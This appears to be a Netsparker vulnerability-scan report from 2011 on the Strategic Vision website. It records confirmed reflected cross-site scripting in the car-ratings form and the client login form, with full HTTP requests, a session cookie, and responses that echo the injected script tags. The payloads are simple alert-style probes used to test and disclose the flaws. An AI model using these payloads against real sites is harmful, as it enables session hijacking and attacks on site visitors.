href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="'"--></style></script><script>netsparker(0x000C1A)</script>" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr> <tr><td>2.</td><td>&l..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST '"--></style></script><script>alert(0x000C1B)</script>
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C1B)%3c%2fscript%3e&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:50:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="'"--></style></script><script>netsparker(0x000C1B)</script>" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr> <tr><td>2.</td><td>&l..
- /client_dao_authenticate.php

/client_dao_authenticate.php CONFIRMED

http://www.strategicvision.com/client_dao_authenticate.php

Parameters

Parameter Type Value
userID POST '"--></style></script><script>alert(0x000C1C)</script>
password POST 3
submitButton POST Login

Request

POST /client_dao_authenticate.php HTTP/1.1
Referer: http://www.strategicvision.com/client_dao_login.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 122
Expect: 100-continue
Accept-Encoding: gzip, deflate

userID='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C1C)%3c%2fscript%3e&password=3&submitButton=Login

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:50:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<script language="JavaScript" type="text/javascript"> alert("Your access code and password are invalid. Please try again."); window.location.href = "client_dao_login.php"; </script> <html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - DAO: Delight &amp; Opportunity</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CLIENTS</div><div class="sidemenu_item"><a href="clients.php">Past Clients</a></div><!--<div class="sidemenu_item"><a href="client_success.php">Success Stories</a></div>--><!--<div class="sidemenu_item"><a href="client_dao_login.php">DAO Login</a></div>--><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;DAO: Delight &amp; Opportunity</div> <div class="pagetext"> <p>User ID: <span class="blogtitle">'"--></style></script><script>netsparker(0x000C1C)</script></span></p> <div class="pagesubtitle">Content</div> <p>Information goes here...</p> </div> <!-- End the page --> </td> </tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
- /client_dao_authenticate.php

/client_dao_authenticate.php CONFIRMED

http://www.strategicvision.com/client_dao_authenticate.php

Parameters

Parameter Type Value
userID POST '"--></style></script><script>alert(0x000C26)</script>
password POST 3

Request

POST /client_dao_authenticate.php HTTP/1.1
Referer: http://www.strategicvision.com/client_dao_login.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 103
Expect: 100-continue
Accept-Encoding: gzip, deflate

userID='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C26)%3c%2fscript%3e&password=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:50:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<script language="JavaScript" type="text/javascript"> alert("Your access code and password are invalid. Please try again."); window.location.href = "client_dao_login.php"; </script> <html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - DAO: Delight &amp; Opportunity</title><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" 